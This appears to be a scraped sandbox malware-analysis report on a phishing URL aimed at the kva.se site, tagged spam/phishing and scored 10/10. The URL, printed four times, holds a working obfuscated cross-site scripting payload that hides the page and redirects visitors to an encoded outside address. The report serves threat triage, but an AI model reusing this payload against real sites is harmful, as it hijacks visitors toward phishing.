hxxps://www[.]kva[.]se/?s=%%22%3E%7CCryptography%20menu[.]get=mime%20%C2%A7intelligence[.]start(dispatchEvent)%20lib%20%C2%A7computing(start)[.]reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location[.]reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu[.]get=%60mime%60%20library[.]start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60)[.]load%20arch[.]hand()%20folder[.]setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60[.]fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj[.]attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow[.]par%60%2B%60ent[.]docu%60%2B%60ment[.]docu%60%2B%60mentEle%60%2B%60ment[.]st%60%2B%60yle[.]opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow[.]par%60%2B%60ent[.]loca%60%2B%60tion[.]hr%60%2B%60ef=url[.]map(value=%60%2BString[.]fromCharCode(62)%2B%60String[.]fromCharCode(value%5E42))[.]jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw[.]toUpUpDown()%2A%2F%60;codeString=codeString[.]replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep[.]over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max[.]do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display[:]block;position[:]fixed;z-index[:]997483649;top[:]0;left[:]0;width[:]2000px;height[:]2000px;backgroundcolor[:]white;%3E%3C%2Fspan%3E%7CCryptography%20menu[.]get=mime%20%C2%A7intelligence[.]start(dispatchEvent)%20lib%20%C2%A7computing(start)[.]reality%20arch[.]learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location[.]reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder[.]setElementByCode(socar~ar)

Sharing

Copy URL

Twitter E-mail

General

Target

https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)
Sample

240222-wzvheaea68

Score

10^/10

customersurveyspam phishing

Behavioral task

behavioral1

Sample

https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)

Resource

win10v2004-20240221-en

windows10-2004-x64

8 signatures

150 seconds

Malware Config

Targets

- Target
  
  https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)
Score

1^/10
behavioral1

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Sharing

General

Malware Config

Targets

MITRE ATT&CK Matrix ATT&CK v13

Tasks

static1

urlscan1

behavioral1